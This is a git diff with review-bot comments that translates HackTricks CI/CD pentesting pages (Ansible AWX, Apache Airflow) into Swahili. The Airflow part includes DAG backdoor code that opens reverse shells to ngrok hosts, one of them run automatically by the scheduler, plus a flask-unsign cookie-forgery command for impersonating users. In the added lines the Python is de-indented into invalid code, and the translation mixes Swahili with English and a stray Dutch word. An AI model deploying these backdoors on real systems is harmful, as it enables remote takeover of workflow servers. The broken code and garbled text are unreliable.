diff --git a/src/README.md b/src/README.md
index 01b146fd1..c51d8a491 100644
--- a/src/README.md
+++ b/src/README.md
@@ -9,23 +9,23 @@ Reading time: {{ #reading_time }}
_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
> [!TIP]
-> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news.
+> Karibu kwenye ukurasa ambapo utaweza kupata kila **hacking trick/technique/whatever related to CI/CD & Cloud** nilizojifunza katika **CTFs**, **maisha** halisi **mazingira**, **utafiti**, na **kusoma** tafiti na habari.
### **Pentesting CI/CD Methodology**
-**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:**
+**Katika HackTricks CI/CD Methodology utaweza kuona jinsi ya pentest miundombinu inayohusiana na shughuli za CI/CD.** Soma ukurasa ufuatao kwa **utangulizi:**
[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
### Pentesting Cloud Methodology
-**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:**
+**Katika HackTricks Cloud Methodology utaweza kuona jinsi ya pentest mazingira ya wingu.** Soma ukurasa ufuatao kwa **utangulizi:**
[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
### License & Disclaimer
-**Check them in:**
+**Angalia katika:**
[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
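Review bot: the Swahili in the `+` lines is translated word by word around the bold markers, so `**maisha** halisi **mazingira**` reads as three unrelated words instead of "real life environments"; translate the phrase as a unit (for example `**mazingira halisi**`) and re-apply the bold to the whole phrase. The three `###` headings (`Pentesting CI/CD Methodology`, `Pentesting Cloud Methodology`, `License & Disclaimer`) are left in English while their bodies are translated; pick one rule for headings and apply it across the patch.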
@@ -34,7 +34,3 @@ _Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.co

{{#include ./banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index feae5163c..1b1d60c58 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -505,3 +505,5 @@
+
+
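Review bot: this hunk only appends two empty lines to the end of SUMMARY.md, while the README.md and banner hunks in the same patch remove their trailing blank lines; drop these two `+` lines so the patch is consistent about trailing whitespace and contains no whitespace-only changes unrelated to the translation.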
diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md
index b684cee3d..1d810d657 100644
--- a/src/banners/hacktricks-training.md
+++ b/src/banners/hacktricks-training.md
@@ -1,17 +1,13 @@
> [!TIP]
-> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+> Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+> Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
>
>
>
> Support HackTricks
>
-> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-> - **Join the** š¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** š¦ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
+> - **Jiunge na** š¬ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** š¦ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
>
-
-
-
-
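Review bot: `> Support HackTricks` is left in English as a context line inside a block whose list items are all translated, so the banner renders half-translated; translate it in this patch or say why it is kept. The mojibake sequences `š¬` and `š¦` (broken emoji) are copied unchanged from the `-` lines into the `+` lines; since these lines are being rewritten anyway, restore the intended characters here instead of propagating the corruption into the new file.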
diff --git a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
index d3fbf19e5..0199a17a0 100644
--- a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
+++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
@@ -4,60 +4,59 @@
## Basic Information
-**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansibleās user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Towerās REST API and command-line interface make it simple to integrate it into current tools and workflows.
+**Ansible Tower** au toleo lake la wazi [**AWX**](https://github.com/ansible/awx) pia inajulikana kama **kiwango cha mtumiaji wa Ansible, dashibodi, na REST API**. Pamoja na **udhibiti wa ufikiaji kulingana na majukumu**, kupanga kazi, na usimamizi wa hesabu wa picha, unaweza kusimamia miundombinu yako ya Ansible kutoka kwa UI ya kisasa. REST API ya Tower na kiolesura cha amri hufanya iwe rahisi kuunganisha na zana na mifumo ya kazi ya sasa.
-**Automation Controller is a newer** version of Ansible Tower with more capabilities.
+**Automation Controller ni toleo jipya** la Ansible Tower lenye uwezo zaidi.
### Differences
-According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows.
+Kulingana na [**hii**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), tofauti kuu kati ya Ansible Tower na AWX ni msaada uliopokelewa na Ansible Tower ina vipengele vya ziada kama udhibiti wa ufikiaji kulingana na majukumu, msaada wa APIs za kawaida, na mifumo ya kazi iliyofafanuliwa na mtumiaji.
### Tech Stack
-- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs.
-- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface.
-- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data.
-- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners.
-- **Redis**: Redis serves as a cache and a backend for the task queue.
+- **Web Interface**: Hii ni kiolesura cha picha ambapo watumiaji wanaweza kusimamia hesabu, ithibati, templeti, na kazi. Imeundwa kuwa ya kueleweka na inatoa picha kusaidia kuelewa hali na matokeo ya kazi zako za automatisering.
+- **REST API**: Kila kitu unachoweza kufanya kwenye kiolesura cha wavuti, unaweza pia kufanya kupitia REST API. Hii inamaanisha unaweza kuunganisha AWX/Tower na mifumo mingine au kuandika hatua ambazo ungeweza kufanya kawaida kwenye kiolesura.
+- **Database**: AWX/Tower inatumia hifadhidata (kawaida PostgreSQL) kuhifadhi usanidi wake, matokeo ya kazi, na data nyingine muhimu za uendeshaji.
+- **RabbitMQ**: Hii ni mfumo wa ujumbe unaotumiwa na AWX/Tower kuwasiliana kati ya vipengele tofauti, hasa kati ya huduma ya wavuti na waendesha kazi.
+- **Redis**: Redis inatumika kama cache na nyuma ya foleni ya kazi.
### Logical Components
-- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc.
-- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed..
-- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job.
-- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run.
-- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials.
-- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events.
-- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc.
-- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed.
+- **Inventories**: Hesabu ni **mkusanyiko wa wenyeji (au nodi)** ambao **kazi** (Ansible playbooks) zinaweza **kufanywa**. AWX/Tower inakuwezesha kufafanua na kuunganisha hesabu zako na pia inasaidia hesabu za kidinamik ambazo zinaweza **kupata orodha za wenyeji kutoka mifumo mingine** kama AWS, Azure, nk.
+- **Projects**: Mradi kimsingi ni **mkusanyiko wa Ansible playbooks** zinazotolewa kutoka kwa **mfumo wa udhibiti wa toleo** (kama Git) ili kuvuta playbooks za hivi karibuni inapohitajika.
+- **Templates**: Templeti za kazi zinafafanua **jinsi playbook fulani itakavyofanywa**, ikitaja **hesabu**, **ithibati**, na **vigezo** vingine vya kazi.
+- **Credentials**: AWX/Tower inatoa njia salama ya **kusimamia na kuhifadhi siri, kama funguo za SSH, nywila, na token za API**. Ithibati hizi zinaweza kuunganishwa na templeti za kazi ili playbooks zipate ufikiaji unaohitajika zinapofanya kazi.
+- **Task Engine**: Hapa ndipo uchawi unafanyika. Injini ya kazi imejengwa juu ya Ansible na inawajibika kwa **kufanya playbooks**. Kazi zinatumwa kwa injini ya kazi, ambayo kisha inafanya playbooks za Ansible dhidi ya hesabu iliyotengwa kwa kutumia ithibati zilizotolewa.
+- **Schedulers and Callbacks**: Hizi ni vipengele vya juu katika AWX/Tower vinavyoruhusu **kazi kuandaliwa** kufanywa kwa nyakati maalum au kuanzishwa na matukio ya nje.
+- **Notifications**: AWX/Tower inaweza kutuma arifa kulingana na mafanikio au kushindwa kwa kazi. Inasaidia njia mbalimbali za arifa kama barua pepe, ujumbe wa Slack, webhooks, nk.
+- **Ansible Playbooks**: Ansible playbooks ni zana za usanidi, uwekaji, na uratibu. Zinabainisha hali inayotakiwa ya mifumo kwa njia ya automatisering, inayoweza kurudiwa. Imeandikwa kwa YAML, playbooks hutumia lugha ya automatisering ya kutangulia ya Ansible kuelezea usanidi, kazi, na hatua zinazohitajika kutekelezwa.
### Job Execution Flow
-1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower.
+1. **User Interaction**: Mtumiaji anaweza kuingiliana na AWX/Tower ama kupitia **Web Interface** au **REST API**. Hizi zinatoa ufikiaji wa mbele kwa kazi zote zinazotolewa na AWX/Tower.
2. **Job Initiation**:
- - The user, via the Web Interface or API, initiates a job based on a **Job Template**.
- - The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**.
- - Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution.
+- Mtumiaji, kupitia Web Interface au API, anaanzisha kazi kulingana na **Job Template**.
+- Job Template inajumuisha marejeleo kwa **Hesabu**, **Mradi** (unaoshikilia playbook), na **Ithibati**.
+- Mara kazi inapoanzishwa, ombi linawekwa kwa AWX/Tower backend ili kuorodhesha kazi hiyo kwa utekelezaji.
3. **Job Queuing**:
- - **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ.
- - **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution.
+- **RabbitMQ** inashughulikia ujumbe kati ya kipengele cha wavuti na waendesha kazi. Mara kazi inapoanzishwa, ujumbe unatumwa kwa injini ya kazi kwa kutumia RabbitMQ.
+- **Redis** inafanya kazi kama nyuma ya foleni ya kazi, ikisimamia kazi zilizoorodheshwa zinazosubiri utekelezaji.
4. **Job Execution**:
- - The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials.
- - Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**.
- - As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**.
+- **Task Engine** inachukua kazi iliyoorodheshwa. Inapata taarifa muhimu kutoka kwa **Database** kuhusu playbook inayohusishwa na kazi, hesabu, na ithibati.
+- Kwa kutumia playbook ya Ansible iliyopatikana kutoka kwa **Mradi** uliohusishwa, Injini ya Kazi inafanya playbook dhidi ya nodi za **Hesabu** zilizotajwa kwa kutumia **Ithibati** zilizotolewa.
+- Wakati playbook inafanya kazi, matokeo yake ya utekelezaji (kumbukumbu, ukweli, nk) yanakusanywa na kuhifadhiwa katika **Database**.
5. **Job Results**:
- - Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**.
- - Users can then view the results through the Web Interface or query them via the REST API.
- - Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc.
+- Mara playbook inapokamilisha kazi, matokeo (mafanikio, kushindwa, kumbukumbu) yanahifadhiwa kwenye **Database**.
+- Watumiaji wanaweza kisha kuona matokeo kupitia Web Interface au kuyatafuta kupitia REST API.
+- Kulingana na matokeo ya kazi, **Arifa** zinaweza kutumwa ili kuwajulisha watumiaji au mifumo ya nje kuhusu hali ya kazi. Arifa zinaweza kuwa barua pepe, ujumbe wa Slack, webhooks, nk.
6. **External Systems Integration**:
- - **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more.
- - **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution.
- - **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times.
+- **Hesabu** zinaweza kupatikana kwa kidinamik kutoka mifumo ya nje, ikiruhusu AWX/Tower kuvuta wenyeji kutoka vyanzo kama AWS, Azure, VMware, na zaidi.
+- **Miradi** (playbooks) zinaweza kupatikana kutoka kwa mifumo ya udhibiti wa toleo, kuhakikisha matumizi ya playbooks za kisasa wakati wa utekelezaji wa kazi.
+- **Schedulers and Callbacks** zinaweza kutumika kuunganisha na mifumo au zana nyingine, ikifanya AWX/Tower kujibu vichocheo vya nje au kufanya kazi kwa nyakati zilizopangwa.
### AWX lab creation for testing
-[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX:
-
+[**Kufuata nyaraka**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) inawezekana kutumia docker-compose kuendesha AWX:
```bash
git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version
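Review bot: the sub-bullets of the numbered `Job Execution Flow` list lose their leading indentation in the `+` lines (`- - The user, via the Web Interface or API, ...` becomes `+- Mtumiaji, kupitia Web Interface au API, ...`), so they no longer nest under `2. **Job Initiation**:` and the numbered list is split into separate lists when rendered; keep the two-space indent on every sub-bullet. Terminology is also inconsistent inside the hunk: "user interface" is rendered `kiwango cha mtumiaji` in the first paragraph but `kiolesura` in the Tech Stack bullets, and the Dutch word `automatisering` appears twice where a Swahili term for automation is needed. The blank line between `[**Kufuata nyaraka**]...` and the ```bash fence is removed as well; that change is unrelated to the translation and only adds noise to the diff.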
@@ -83,7 +82,6 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser
# Load demo data
docker exec tools_awx_1 awx-manage create_preload_data
```
-
## RBAC
### Supported roles
@@ -97,47 +95,43 @@ From a **white box security** review, you would need the **System Auditor role**
Expand this to get detailed description of available roles
1. **System Administrator**:
- - This is the superuser role with permissions to access and modify any resource in the system.
- - They can manage all organizations, teams, projects, inventories, job templates, etc.
+- This is the superuser role with permissions to access and modify any resource in the system.
+- They can manage all organizations, teams, projects, inventories, job templates, etc.
2. **System Auditor**:
- - Users with this role can view all system data but cannot make any changes.
- - This role is designed for compliance and oversight.
+- Users with this role can view all system data but cannot make any changes.
+- This role is designed for compliance and oversight.
3. **Organization Roles**:
- - **Admin**: Full control over the organization's resources.
- - **Auditor**: View-only access to the organization's resources.
- - **Member**: Basic membership in an organization without any specific permissions.
- - **Execute**: Can run job templates within the organization.
- - **Read**: Can view the organizationās resources.
+- **Admin**: Udhibiti kamili juu ya rasilimali za shirika.
+- **Auditor**: Ufikiaji wa kuangalia tu kwa rasilimali za shirika.
+- **Member**: Uanachama wa msingi katika shirika bila ruhusa maalum.
+- **Execute**: Anaweza kuendesha templeti za kazi ndani ya shirika.
+- **Read**: Anaweza kuona rasilimali za shirika.
4. **Project Roles**:
- - **Admin**: Can manage and modify the project.
- - **Use**: Can use the project in a job template.
- - **Update**: Can update project using SCM (source control).
+- **Admin**: Anaweza kusimamia na kubadilisha mradi.
+- **Use**: Anaweza kutumia mradi katika templeti ya kazi.
+- **Update**: Anaweza kuboresha mradi kwa kutumia SCM (udhibiti wa chanzo).
5. **Inventory Roles**:
- - **Admin**: Can manage and modify the inventory.
- - **Ad Hoc**: Can run ad hoc commands on the inventory.
- - **Update**: Can update the inventory source.
- - **Use**: Can use the inventory in a job template.
- - **Read**: View-only access.
+- **Admin**: Anaweza kusimamia na kubadilisha hesabu.
+- **Ad Hoc**: Anaweza kuendesha amri za ad hoc kwenye hesabu.
+- **Update**: Anaweza kuboresha chanzo cha hesabu.
+- **Use**: Anaweza kutumia hesabu katika templeti ya kazi.
+- **Read**: Ufikiaji wa kuangalia tu.
6. **Job Template Roles**:
- - **Admin**: Can manage and modify the job template.
- - **Execute**: Can run the job.
- - **Read**: View-only access.
+- **Admin**: Anaweza kusimamia na kubadilisha templeti ya kazi.
+- **Execute**: Anaweza kuendesha kazi.
+- **Read**: Ufikiaji wa kuangalia tu.
7. **Credential Roles**:
- - **Admin**: Can manage and modify the credentials.
- - **Use**: Can use the credentials in job templates or other relevant resources.
- - **Read**: View-only access.
+- **Admin**: Anaweza kusimamia na kubadilisha akreditivu.
+- **Use**: Anaweza kutumia akreditivu katika templeti za kazi au rasilimali nyingine zinazohusiana.
+- **Read**: Ufikiaji wa kuangalia tu.
8. **Team Roles**:
- - **Member**: Part of the team but without any specific permissions.
- - **Admin**: Can manage the team's members and associated resources.
+- **Member**: Sehemu ya timu lakini bila ruhusa maalum.
+- **Admin**: Anaweza kusimamia wanachama wa timu na rasilimali zinazohusiana.
9. **Workflow Roles**:
- - **Admin**: Can manage and modify the workflow.
- - **Execute**: Can run the workflow.
- - **Read**: View-only access.
+- **Admin**: Anaweza kusimamia na kubadilisha mchakato.
+- **Execute**: Anaweza kuendesha mchakato.
+- **Read**: Ufikiaji wa kuangalia tu.
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
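Review bot: items 1 and 2 (`System Administrator`, `System Auditor`) are de-indented but left in English while items 3 to 9 are translated, so the role list is half-translated; either translate those four lines here or leave them untouched. As in the earlier hunk, stripping the two-space indent from every sub-bullet (`- - **Admin**: ...` to `+- **Admin**: ...`) flattens the nested list so the role bullets no longer belong to their numbered parent. `credentials` is translated `akreditivu` here but `ithibati` in the Logical Components section of the same file; use one term.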
diff --git a/src/pentesting-ci-cd/apache-airflow-security/README.md b/src/pentesting-ci-cd/apache-airflow-security/README.md
index aac46128c..3fdb9cb25 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/README.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/README.md
@@ -4,20 +4,19 @@
### Basic Information
-[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
+[**Apache Airflow**](https://airflow.apache.org) inatumika kama jukwaa la **kuandaa na kupanga mipango ya data au kazi**. Neno "kuandaa" katika muktadha wa mipango ya data linaashiria mchakato wa kupanga, kuratibu, na kusimamia kazi ngumu za data zinazotokana na vyanzo mbalimbali. Lengo kuu la mipango hii ya data iliyopangwa ni kutoa seti za data zilizoshughulikiwa na zinazoweza kutumika. Seti hizi za data zinatumika sana na maombi mengi, ikiwa ni pamoja na lakini sio tu zana za akili ya biashara, sayansi ya data na mifano ya kujifunza mashine, ambazo zote ni msingi wa utendaji wa maombi makubwa ya data.
-Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
+Kwa msingi, Apache Airflow itakuruhusu **kupanga utekelezaji wa msimbo wakati kitu** (tukio, cron) **kinatokea**.
### Local Lab
#### Docker-Compose
-You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
+Unaweza kutumia **faili ya usanidi ya docker-compose kutoka** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) kuanzisha mazingira kamili ya docker ya apache airflow. (Ikiwa uko kwenye MacOS hakikisha unatoa angalau 6GB ya RAM kwa VM ya docker).
#### Minikube
-One easy way to **run apache airflo**w is to run it **with minikube**:
-
+Njia moja rahisi ya **kufanya kazi apache airflow** ni kuikimbia **na minikube**:
```bash
helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
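Review bot: the blank line between `Njia moja rahisi ya ...` and the ```bash fence is dropped (the removed empty line has no `+` counterpart); the fence still parses, but this whitespace churn recurs in every file of the patch and should be reverted or split into its own commit so the diff shows only translation changes. Also, "run" is rendered `kuendesha` in the Ansible hunk (`kuendesha AWX`) but `kufanya kazi` and `kuikimbia` on this line; `kuendesha` is the consistent choice.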
@@ -27,10 +26,9 @@ helm install airflow-release airflow-stable/airflow
# Use this command to delete it
helm delete airflow-release
```
-
### Airflow Configuration
-Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
+Airflow inaweza kuhifadhi **taarifa nyeti** katika usanidi wake au unaweza kupata usanidi dhaifu ulio katika nafasi:
{{#ref}}
airflow-configuration.md
@@ -38,7 +36,7 @@ airflow-configuration.md
### Airflow RBAC
-Before start attacking Airflow you should understand **how permissions work**:
+Kabla ya kuanza kushambulia Airflow unapaswa kuelewa **jinsi ruhusa zinavyofanya kazi**:
{{#ref}}
airflow-rbac.md
@@ -48,55 +46,52 @@ airflow-rbac.md
#### Web Console Enumeration
-If you have **access to the web console** you might be able to access some or all of the following information:
+Ikiwa una **ufikiaji wa console ya wavuti** unaweza kuwa na uwezo wa kufikia baadhi au yote ya taarifa zifuatazo:
-- **Variables** (Custom sensitive information might be stored here)
-- **Connections** (Custom sensitive information might be stored here)
- - Access them in `http:///connection/list/`
-- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
-- List **users & roles**
-- **Code of each DAG** (which might contain interesting info)
+- **Variables** (Taarifa nyeti za kawaida zinaweza kuhifadhiwa hapa)
+- **Connections** (Taarifa nyeti za kawaida zinaweza kuhifadhiwa hapa)
+- Fikia hizo katika `http:///connection/list/`
+- [**Configuration**](./#airflow-configuration) (Taarifa nyeti kama **`secret_key`** na nywila zinaweza kuhifadhiwa hapa)
+- Orodhesha **watumiaji & majukumu**
+- **Code ya kila DAG** (ambayo inaweza kuwa na taarifa za kuvutia)
#### Retrieve Variables Values
-Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http:///variable/list/`.\
-Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**.
+Variables zinaweza kuhifadhiwa katika Airflow ili **DAGs** ziweze **kufikia** thamani zao. Ni sawa na siri za majukwaa mengine. Ikiwa una **ruhusa za kutosha** unaweza kuzifikia katika GUI katika `http:///variable/list/`.\
+Airflow kwa kawaida itaonyesha thamani ya variable katika GUI, hata hivyo, kulingana na [**hii**](https://marclamberti.com/blog/variables-with-apache-airflow/) inawezekana kuweka **orodha ya variables** ambazo **thamani** zitakuwa zinaonekana kama **asterisks** katika **GUI**.
.png>)
-However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
-To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
-Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it:
+Hata hivyo, hizi **thamani** bado zinaweza **kupatikana** kupitia **CLI** (unahitaji kuwa na ufikiaji wa DB), **kutekeleza DAG** isiyo na mipaka, **API** inayofikia mwisho wa variables (API inahitaji kuwezeshwa), na **hata GUI yenyewe!**\
+Ili kufikia hizo thamani kutoka kwa GUI chagua tu **variables** unazotaka kufikia na **bonyeza kwenye Actions -> Export**.\
+Njia nyingine ni kufanya **bruteforce** kwa **thamani iliyofichwa** ukitumia **uchujaji wa utafutaji** hadi upate hiyo:
.png>)
#### Privilege Escalation
-If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
-
+Ikiwa usanidi wa **`expose_config`** umewekwa kuwa **True**, kutoka **kwa jukumu la Mtumiaji** na **juu** wanaweza **kusoma** **usanidi kwenye wavuti**. Katika usanidi huu, **`secret_key`** inaonekana, ambayo inamaanisha mtumiaji yeyote mwenye hii halali wanaweza **kuunda keki yao iliyosainiwa ili kujifanya kuwa akaunti nyingine yoyote ya mtumiaji**.
```bash
flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
```
+#### DAG Backdoor (RCE katika Airflow worker)
-#### DAG Backdoor (RCE in Airflow worker)
-
-If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
-Note that this reverse shell is going to be executed inside an **airflow worker container**:
-
+Ikiwa una **ufikiaji wa kuandika** mahali ambapo **DAGs zimehifadhiwa**, unaweza tu **kuunda moja** ambayo itakutumia **reverse shell.**\
+Kumbuka kwamba reverse shell hii itatekelezwa ndani ya **airflow worker container**:
```python
import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator
with DAG(
- dag_id='rev_shell_bash',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_bash',
+schedule_interval='0 0 * * *',
+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
- run = BashOperator(
- task_id='run',
- bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
- )
+run = BashOperator(
+task_id='run',
+bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
+)
```
```python
@@ -105,75 +100,66 @@ from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
- s = socket.socket()
- s.connect((rhost, port))
- [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
- pty.spawn("/bin/sh")
+s = socket.socket()
+s.connect((rhost, port))
+[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
+pty.spawn("/bin/sh")
with DAG(
- dag_id='rev_shell_python',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_python',
+schedule_interval='0 0 * * *',
+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
- run = PythonOperator(
- task_id='rs_python',
- python_callable=rs,
- op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
- )
+run = PythonOperator(
+task_id='rs_python',
+python_callable=rs,
+op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
+)
```
+#### DAG Backdoor (RCE katika Airflow scheduler)
-#### DAG Backdoor (RCE in Airflow scheduler)
-
-If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
-
+Ikiwa utaweka kitu kifanyike **katika mzizi wa msimbo**, wakati wa kuandika hii, kita **fanywa na scheduler** baada ya sekunde chache baada ya kukiweka ndani ya folda ya DAG.
```python
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
- s = socket.socket()
- s.connect((rhost, port))
- [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
- pty.spawn("/bin/sh")
+s = socket.socket()
+s.connect((rhost, port))
+[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
+pty.spawn("/bin/sh")
rs("2.tcp.ngrok.io", 14403)
with DAG(
